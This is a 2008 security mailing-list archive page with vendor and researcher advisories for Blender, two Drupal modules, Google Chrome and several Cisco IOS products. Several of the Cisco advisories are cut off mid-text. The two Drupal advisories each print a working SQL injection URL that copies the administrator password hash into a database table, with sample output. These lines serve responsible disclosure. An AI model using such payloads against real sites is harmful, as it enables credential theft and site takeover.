[ MDVSA-2008:204 ] blender
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:204 http://www.mandriva.com/security/ ___ Package : blender Date: September 24, 2008 Affected: 2008.0, 2008.1 ___ Problem Description: Stefan Cornelius of Secunia Research reported a boundary error when Blender processed RGBE images which could be used to execute arbitrary code with the privileges of the user running Blender if a specially crafted .hdr or .blend file were opened(CVE-2008-1102). As well, multiple vulnerabilities involving insecure usage of temporary files had also been reported (CVE-2008-1103). The updated packages have been patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1102 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1103 ___ Updated Packages: Mandriva Linux 2008.0: e3a5d49f7b992b7cc4cd9525d73ea4f6 2008.0/i586/blender-2.45-2.1mdv2008.0.i586.rpm d5691e5af5c50fb80fc244e427918003 2008.0/SRPMS/blender-2.45-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5411e43bc26366a1ec9f3a0da3670eb0 2008.0/x86_64/blender-2.45-2.1mdv2008.0.x86_64.rpm d5691e5af5c50fb80fc244e427918003 2008.0/SRPMS/blender-2.45-2.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 32cad77461dca17240719d8f3bb6cf6b 2008.1/i586/blender-2.45-7.1mdv2008.1.i586.rpm e65dbe183dbbb3420707218d69ce9897 2008.1/SRPMS/blender-2.45-7.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: a3f83bb2a3617a2d80efaccb9c207f21 2008.1/x86_64/blender-2.45-7.1mdv2008.1.x86_64.rpm e65dbe183dbbb3420707218d69ce9897 2008.1/SRPMS/blender-2.45-7.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFI2nPgmqjQ0CJFipgRApSPAKDEO9CNH2N7b4pBtGK+/3sappwZ/QCgkK9Y iUB4G7TCk232f4WDBZcQE0s= =16a/ -END PGP SIGNATURE-
Drupal Ajax Checklist Module SQL Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Drupal Ajax Checklist Module SQL Injection Vulnerability * Discovery Date: Sept 15, 2008 * Security risk: high * Exploitable from: Remote * Vulnerability: SQL Injection * Discovered by: Justin C. Klein Keane <[EMAIL PROTECTED]> Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security. The Ajax Checklist module (http://drupal.org/project/ajax_checklist), created by AsciiKewl (http://drupal.org/user/147292) is designed to allow users to input dynamic checklists into nodes. These checklists can then be checked or unchecked with state tracked via AJAX calls to pages that store the state in the database. Due to poor input validation on the AJAX handling pages, this module is vulnerable to SQL injection attacks. Depending on configuration, these attacks could be carried out by remote unauthenticated users. Due to it's data driven design, SQL injection attacks pose a critical threat to Drupal installations and their hosts and could lead to full control over the webserver process. The critical flaw exists within the ajax_checklist_save() function (lines 61-84 of ajax_checklist.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL. These parameters are then used to craft SQL select, insert, and update statements without first being sanitized. Vulnerable Versions 5.x-1.0 dated 1007-Aug-18 was tested and shown vulnerable Testing for Vulnerability Calling the URL: http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4 will cause the administrator password to be inserted into the ajax_checkbox table in the Drupal database: mysql> select * from ajax_checklist; +-+--+--+---+ | nid | user | qid | state | +-+--+--+---+ | 1 |0 | 2| 2 | | 3 |3 | 4202b5f87a68583e20aae6917c8c33d1 | 3 | | 4 |4 | 4| 3 | +-+--+--+---+ Impact Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation. Determining Version The ajax_checklist.info page for vulnerable versions displays the following information: ; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $ name = Ajax Checklist description = Creates filter-driven checklists with ajax updating to the database package = Other version = 5.x-0.1 ; Information added by drupal.org packaging script on 2007-08-18 version = "5.x-1.0" project = "ajax_checklist" datestamp = "1187416501" Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214). Vendor Response Drupal security team contacted September 17, 2008. A security patch and announcement should be available Wednesday September 24, 2008. - -- Justin C. Klein Keane http://www.MadIrish.net -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iPwEAQECAAYFAkjakiMACgkQkSlsbLsN1gAHqgb8Cn+KHQOHCJqZXhtd1Nuhhjjl aE2q0njdi9KX+zjNKPEqXhvY6BJNkj6ql0rea7acsxW3d+/0+eDlMQ1Y76nCznOk zBk1KU/6XymZ2xtvkxpxpAE1gaVbVtjeijuqAYkonQps8qdm6ZSV5UQpadjcxyFW 4UXmhXa0lithie8nR8P7Hej6BiqeGMQLr+kHPFK0JdvtfW6sFziXXbzNzGNgTjFV 51S/qbb8K5q1EwMs23JXHu5tFWEZWmgFBPn8dva+uxYQDxO80nSovuh+itqzO9jz 8pCjulvjPEO8xg8PE4Q= =/d0S -END PGP SIGNATURE-
Drupal Brilliant Gallery module SQL injection vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 * Discovery Date: Sept 17, 2008 * Security risk: high * Exploitable from: Remote * Vulnerability: SQL Injection * Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish) Description Drupal (http://drupal.org) is a robust content management system (CMS) that provides extensibility through hundreds of third party modules. While the security of Drupal core modules is vetted by a central security team, third party modules are not reviewed for security. The Brilliant module (http://drupal.org/project/brilliant_gallery), created by Vacilanda (http://www.vacilando.org/) is designed to allow users to easily create dynamic picture galleries by uploading images directly to a server and including code directly within nodes to display the gallery. The critical flaw exists within the brilliant_gallery_checklist_save() function (lines 109-129 of briliant_gallery.module). This function accepts three parameters ($nid,$qid, and $state), all of which can be manipulated via a properly crafted URL (defined by a callback in brilliant_gallery_menu() on line 307 of brilliant_gallery.module) These parameters are then used to craft SQL injections via remote URL request. 5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable Testing for Vulnerability Calling the URL: http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from users where uid=1),3),(4,4,4,'4 will cause the administrator password to be inserted into the brilliant_gallery_checklist table in the Drupal database: mysql> select * from brilliant_gallery_checklist; +-+--+--+---+ | nid | user | qid | state | +-+--+--+---+ | 2 |0 | 2| 2 | | 3 |3 | 4202a5f87b68583e2eaaa6922c8c38d1 | 3 | | 4 |4 | 4| 4 | +-+--+--+---+ Impact Highly critical. Depending on configuration, this vulnerability could allow attackers to compromise the Drupal administrator account, an attack that can lead to web server and even host compromise since the administrator can configure file uploads and alter any content on the Drupal installation. Determining Version The brilliant_gallery.info page for vulnerable versions displays the following information: ; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $ name = Brilliant Gallery description = Creates a fully customizable table gallery of quality-scaled images from a pre-defined folder. dependencies = lightbox2 colorpicker package = Media ; Information added by drupal.org packaging script on 2008-05-05 version = "5.x-3.1" project = "brilliant_gallery" datestamp = "1210030204" ; Information added by drupal.org packaging script on 2008-07-17 version = "5.x-4.1" project = "brilliant_gallery" datestamp = "1216327204" Determining version information on Drupal sites is trivial in many cases (ref http://www.madirish.net/?article=214). Vendor Response Drupal security team contacted via e-mail September 19, 2008. Vendor contacted September 19, 2008 via contact form submission at http://www.vacilando.eu/contact. Vulnerability announcement should be available at http://drupal.org/security by Wednesday, September 24, 2008. No details about patch release are available at this time. - -- Justin C. Klein Keane http://www.MadIrish.net http://Justin.MadIrish.net -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iPwEAQECAAYFAkjalScACgkQkSlsbLsN1gAR7Ab/bL1vvJvVhIVlkE5aOKUmH3K5 30qO/paQ8xqstrxVT/sMJYN7MXtjYL9gk73qFNhOBEgIbs9Dth7CqBMdk5vT2BiO 3lZcuNuquwLNv2ZhPK6bOUN9G0Pdmntr2YqNTgXCSPNpM7F+K75uPNENRFZKL8Yb DLgn3q1smbJVFLm8/Xt8Y0g7Q7C8kxh7TYTK/WyhNs+KrxlzsilpAViydmqkNuVR ob/nsYj/o5d8DN8vk0xHrvzNbeQCJX2tSZKKh6427zC6zK+dm8uTAnALpHzS/BT5 R2Oq9aOFw1BeGdcUKmk= =QUap -END PGP SIGNATURE-
Re: Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.
I'm also using Google Chrome. Another concern for me - its setup downloads: http://cache.pack.google.com/chrome/install/149.30/chrome_installer.exe which is not signed by authenticode. Can anyone post hashes of this file downloaded over a trusted network? Or, is this info available at some trusted sources? Thanks in advance, On 9/24/08, Aditya K Sood <[EMAIL PROTECTED]> wrote: > > *Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.* > > *Version Affected:* > Chrome/0.2.149.30 > Chrome/0.2.149.29 > > *Severity:* > High > > *Description:* > The Google chrome browser is vulnerable to memory exhaustion based > denial of > service which can be triggered remotely.The vulnerability triggers when > Carriage > Return(\r\n\r\n) is passed as an argument to window.open() function. It > makes the > Google Chrome to generate number of windows at the same time thereby > leading > to memory exhaustion. The behavior can be easily checked by looking at > the task > manager as with no time the memory usage rises high. The problem lies in > the handling > of object and its value returned by the javascript function. Once it is > triggered the pop > ups are started generating. The Google Chrome browser generate object > windows continuously > there by affecting memory of the resultant system. Probably it can be > crashed within no time. > User interaction is required in this. > > *Proof of Concept* > http://www.secniche.org/gds > > *Links:* > http://secniche.org/gcrds.html > http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php > > *Detection:* > SecNiche confirmed this vulnerability affects Google Chrome on Microsoft > Windows XP SP2 platform.The versions tested are: > > Chrome/0.2.149.30 > Chrome/0.2.149.291 > > *Disclosure Timeline:* > Disclosed: 22 September 2008 > Release Date. September 24 ,2008 > > *Vendor Response:* > Google acknowledges this vulnerability and "fix" will be released soon. > > *Credit:* > Aditya K Sood > > *Disclaimer* > The information in the advisory is believed to be accurate at the time > of publishing based on > currently available information. Use of the information constitutes > acceptance for use in an > AS IS condition. There is no representation or warranties, either > express or implied by or with > respect to anything in this document, and shall not be liable for a ny > implied warranties of > merchantability or fitness for a particular purpose or for any indirect > special or consequential > damages. >
Cisco Security Advisory: Cisco IOS IPS Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS IPS Denial of Service Vulnerability Advisory ID: cisco-sa-20080924-iosips http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === The Cisco IOS Intrusion Prevention System (IPS) feature contains a vulnerability in the processing of certain IPS signatures that use the SERVICE.DNS engine. This vulnerability may cause a router to crash or hang, resulting in a denial of service condition. Cisco has released free software updates that address this vulnerability. There is a workaround for this vulnerability. Note: This vulnerability is not related in any way to CVE-2008-1447 - Cache poisoning attacks. Cisco Systems has published a Cisco Security Advisory for that vulnerability, which can be found at http://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Vulnerable Products +-- Any Cisco IOS device configured with the Cisco IOS IPS feature is vulnerable, regardless if it is configured to use the built-in signatures or an external signature file. Devices using either version 4 or version 5 signatures are affected by this vulnerability. The Cisco IOS IPS feature is not enabled by default. The command show ip ips interfaces can be used to determine if the Cisco IOS IPS feature has been configured and applied to any interface on the device, as in the following example: Router#show ip ips interfaces Interface Configuration Interface FastEthernet0/0 Inbound IPS rule is ios-ips-incoming Outgoing IPS rule is not set Interface FastEthernet0/1 Inbound IPS rule is not set Outgoing IPS rule is ios-ips-outgoing Router# The output of the show ip ips interfaces command when the Cisco IOS IPS feature has not been configured is dependent on which Cisco IOS release is installed and running on the device. It may be similar to the following example: Router#show ip ips interfaces Router# or it may be similar to the following: Router#show ip ips interfaces Interface Configuration IPS is not configured on any interface Router# Any version of Cisco IOS prior to the versions which are listed in the Software Versions and Fixes section below is vulnerable. To determine the version of the Cisco IOS software running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS". On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the show version command or will give different output. The following example identifies a Cisco product running Cisco IOS Software release 12.3(26) with an installed image name of C2500-IS-L: Router#show version Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2008 by cisco Systems, Inc. Compiled Mon 17-Mar-08 14:39 by dchih Router# The next exampl
Cisco Security Advisory: Cisco IOS MPLS VPN May Leak Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS MPLS VPN May Leak Information Advisory ID: cisco-sa-20080924-vpn http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Devices running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and configured for Multiprotocol Label Switching (MPLS) Virtual Private Networks (VPNs) or VPN Routing and Forwarding Lite (VRF Lite) and using Border Gateway Protocol (BGP) between Customer Edge (CE) and Provider Edge (PE) devices may permit information to propagate between VPNs. Workarounds are available to help mitigate this vulnerability. This issue is triggered by a logic error when processing extended communities on the PE device. This issue cannot be deterministically exploited by an attacker. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml NOTE: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Products running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and configured for MPLS VPNs or VRF Lite are potentially affected. Cisco IOS releases based on 12.1 are not affected. Vulnerable Products +-- Cisco IOS devices are vulnerable if they are configured for MPLS VPN or VRF Lite and have a BGP session between the CE and PE devices, and process extended communities. If a device is configured for MPLS VPN or VRF Lite the command address-family ipv4 vrf or address-family ipv6 vrf will be present in the device configuration. The following shows a command executed on a device configured for MPLS VPN: router#show running-config | include address-family [ipv4|ipv6] address-family ipv4 vrf The following shows a PE device configured for an IPv4 BGP session between the PE and the CE: router bgp address-family ipv4 vrf one neighbor remote-as < Remote AS> neighbor activate To determine the software running on a Cisco product, log in to the device and issue the "show version" command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS". On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the IOS release name. Other Cisco devices will not have the "show version" command or will give different output. The following example identifies a Cisco product that is running Cisco IOS release 12.4(11)T2: Router#show version Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 12.4(11)T2, RELEASE SOFTWARE (fc4) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Tue 01-May-07 04:19 by prod_rel_team Additional information on the Cisco IOS release naming conventions can be found on the document entitled "White Paper: Cisco IOS Reference Guide", which is available at http://www.cisco.com/warp/public/620/1.html Products Confirmed Not Vulnerable + Cisco products not configured for MPLS VPNs or VRF Lite are unaffected by this vulnerability. Cisco products that do not run IOS are unaffected by this vulnerability. Cisco IOS-XR is not affected. No other Cisco products are currently known to be af
Cisco Security Advisory: Cisco uBR10012 Series Devices SNMP Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco uBR10012 Series Devices SNMP Vulnerability Advisory ID: cisco-sa-20080924-ubr http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Cisco uBR10012 series devices automatically enable Simple Network Management Protocol (SNMP) read/write access to the device if configured for linecard redundancy. This can be exploited by an attacker to gain complete control of the device. Only Cisco uBR10012 series devices that are configured for linecard redundancy are affected. Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml NOTE: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS^ software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = Vulnerable Products +-- Cisco uBR10012 series devices that are running Cisco IOS and configured for linecard redundancy are affected. Cisco uBR10012 series devices can be identified by issuing the show version command. The following example shows output from a Cisco uBR10012 series device running Cisco IOS software release 12.3(17b)BC7: ubr10k#show version | include IOS IOS (tm) 1 Software (UBR10K-K8P6U2-M), Version 12.3(17b)BC7, RELEASE SOFTWARE (fc1) ubr10k# Please refer to the document entitled "White Paper: Cisco IOS Reference Guide" for additional information on the Cisco IOS release naming conventions. This document is available at the following link: http://www.cisco.com/warp/public/620/1.html A Cisco uBR10012 series device configured for linecard redundancy will have a line similar to the following in the output of show running-config command: member subslot / working or hccp protect Any version of Cisco IOS prior to the versions listed in the Software Versions and Fixes section below is vulnerable. Products Confirmed Not Vulnerable + Cisco uBR10012 series devices that are not configured for linecard redundancy are not affected. Cisco 1 series devices are not affected even if they are configured for linecard redundancy. Other uBR platforms are not affected. No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco uBR10012 series devices need to communicate with an RF Switch when configured for linecard redundancy. This communication is based on SNMP (Simple Network Management Protocol). When linecard redundancy is enabled on a Cisco uBR10012 series device, SNMP is also automatically enabled with a default community string of private that has read/write privileges. Since there are no access restrictions on this community string, it may be exploited by an attacker to gain complete control of the device. Changing the default community string, adding access restrictions on SNMP or doing both will mitigate this vulnerability. The recommended mitigation is to do both. This vulnerability is documented in the Cisco Bug ID CSCek57932 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-3807. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accor
Cisco Security Advisory: Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerabilities Advisory ID: cisco-sa-20080924-cucm http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Cisco Unified Communications Manager, formerly Cisco Unified CallManager, contains two denial of service (DoS) vulnerabilities in the Session Initiation Protocol (SIP) service. An exploit of these vulnerabilities may cause an interruption in voice services. Cisco will release free software updates that address these vulnerabilities and this advisory will be updated as fixed software becomes available. There are no workarounds for these vulnerabilities. Note: Cisco IOS software is also affected by the vulnerabilities described in this advisory. A companion advisory for Cisco IOS software is available at http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml Affected Products = The vulnerabilities described in this document apply to the Cisco Unified Communications Manager. Vulnerable Products +-- The following Cisco Unified Communications Manager versions are affected: * Cisco Unified CallManager 4.1 versions prior to 4.1.3SR8 * Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR4b * Cisco Unified CallManager 4.3 versions prior to 4.3(2)SR1a * Cisco Unified Communications Manager 5.x versions prior to 5.1 (3d) * Cisco Unified Communications Manager 6.x versions prior to 6.1(2) su1 Administrators of systems running Cisco Unified CallManager version 4.x can determine the software version by navigating to Help > About Cisco Unified CallManager and selecting the Details button via the Cisco Unified Communications Manager Administration interface. Administrators of systems that are running Cisco Unified Communications Manager versions 5.x and 6.x can determine the software version by viewing the main page of the Cisco Unified Communications Manager Administration interface. The software version can also be determined by running the command show version active via the command line interface. In Cisco Unified CallManager version 4.x, the use of SIP as a call signaling protocol is not enabled by default, and for the Cisco Unified CallManager server to start listening for SIP messages on TCP and UDP ports 5060 and 5061 a SIP trunk needs to be configured. In Cisco Unified Communications Manager versions 5.x and later, the use of SIP as a call signaling protocol is enabled by default in Cisco Unified Communications Manager and cannot be disabled. Cisco IOS software is also affected by these vulnerabilities, although they are tracked by different Cisco bug IDs. A companion security advisory for Cisco IOS software is available at http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml Products Confirmed Not Vulnerable + With the exception of Cisco IOS software, no other Cisco products are currently known to be vulnerable to the issues described in this advisory. Cisco Unified Communications Manager version 7.x is not affected by these vulnerabilities. Cisco Unified CallManager version 4.x is not affected by these vulnerabilities if it does not have any SIP trunks configured. Details === Cisco Unified Communications Manager is the call processing component of the Cisco IP Telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP gateways, and multimedia applications. SIP is a popular signaling protocol that is used to manage voice and video calls across IP networks such as the Internet. SIP is responsible for handling all aspects of call setup and termination. Voice and video are the most popular types of sessions that SIP handles, but the protocol is flexible to accommodate for other applications that require call setup and termination. SIP call signaling can use UDP (port 5060), TCP (port 5060), or TLS (TCP port 5061) as the underlying transport protocol. Two DoS vulnerabilities exist in the SIP implementation of the Cisco Unified Communications Manager. These vulnerabilities can be triggered while processing specific and valid SIP messages and can lead to a reload of the main Cisco Unified Communications Manager process. Version 4.x of Cisco Unified CallManager do not have SIP enabled by default unless a SIP trunk is configured. Versions 5.x and later of the Cisco Unified Communications Manager have SIP is enabled by default and cannot be disabled. The vulnerabilities are being tracked by the following Cisco bug IDs: * CSCsu38644, assigned CVE ID
Cisco Security Advisory: Cisco IOS Software Firewall Application Inspection Control Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS Software Firewall Application Inspection Control Vulnerability Advisory ID: cisco-sa-20080924-iosfw http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml Revision 1.0 For Public Release 2008 September 24 1600 UTC (GMT) - - Summary === Cisco IOS software configured for IOS firewall Application Inspection Control (AIC) with a HTTP configured application-specific policy are vulnerable to a Denial of Service when processing a specific malformed HTTP transit packet. Successful exploitation of the vulnerability may result in a reload of the affected device. Cisco has released free software updates that address this vulnerability. A mitigation for this vulnerability is available. See the "Workarounds" section for details. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml Note: The September 24, 2008 IOS Advisory bundled publication includes twelve Security Advisories. Eleven of the advisories address vulnerabilities in Cisco's IOS software, and one advisory addresses vulnerabilities in Cisco Unified Communications Manager. Each Advisory lists the releases that correct the vulnerability described in the Advisory. Please reference the following software table to find a release that fixes all published IOS software Advisories as of September 24th, 2008: http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml Individual publication links are listed below: * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml Affected Products = The HTTP AIC feature was introduced in Cisco IOS Software Release 12.4(9)T. The software table in this advisory identifies the affected releases. Vulnerable Products +-- Devices that are running a vulnerable version of Cisco IOS software and configured for Cisco IOS firewall AIC for HTTP are affected. To determine the software running on a Cisco IOS product, log in to the device and issue the show version command-line interface (CLI) command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS." On the next line of output, the image name will be displayed between parentheses, followed by "Version" and the Cisco IOS release name. Other Cisco devices will not have the show version command, or will give different output. The following example shows output from a device running Cisco IOS image 12.4(15)T2: router#show version Cisco IOS Software, 1841 Software (C1841-ADVSECURITYK9-M), Version 12.4(15)T2, RELEASE SOFTWARE (fc7) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2008 by Cisco Systems, Inc. Compiled Thu 17-Jan-08 23:12 by prod_rel_team !--- Output truncated. Additional information on the Cisco IOS release naming conventions can be found on the document entitled "White Paper: Cisco IOS Reference Guide", which is available at http://www.cisco.com/warp/public/620/1.html The device is vulnerable if the configuration has a Layer 7 class map and Layer 7 policy map for HTTP deep packet inspection (DPI), and these policies are applied to any firewall zone. To determine whether the device is running a vulnerable configuration of Cisco IOS firewall AIC for HTTP, log in to the device and issue the CLI command show policy-map type inspect zone-pair | section packet inspection. If the output contains Policy: http layer7-policymap name , the device is vulnerable. The following example shows the response from a vulnerable device: Router#show policy-map type inspect zone-pair | section packet inspection Deep packet inspection Policy: http layer7-policymap 1 packets, 28 bytes Router# Products Confirmed Not Vulnerable + No other Cisco products are currently known to be affected by this vulnerability. IOS releases before 12.4(9)T are not affected by this issue. Products confirmed not vulnerable include: * Cisco PIX * Cisco ASA * Cisco Firewall Services M
Cisco Security Advisory: Cisco IOS NAT Skinny Call Control Protocol Vulnerability
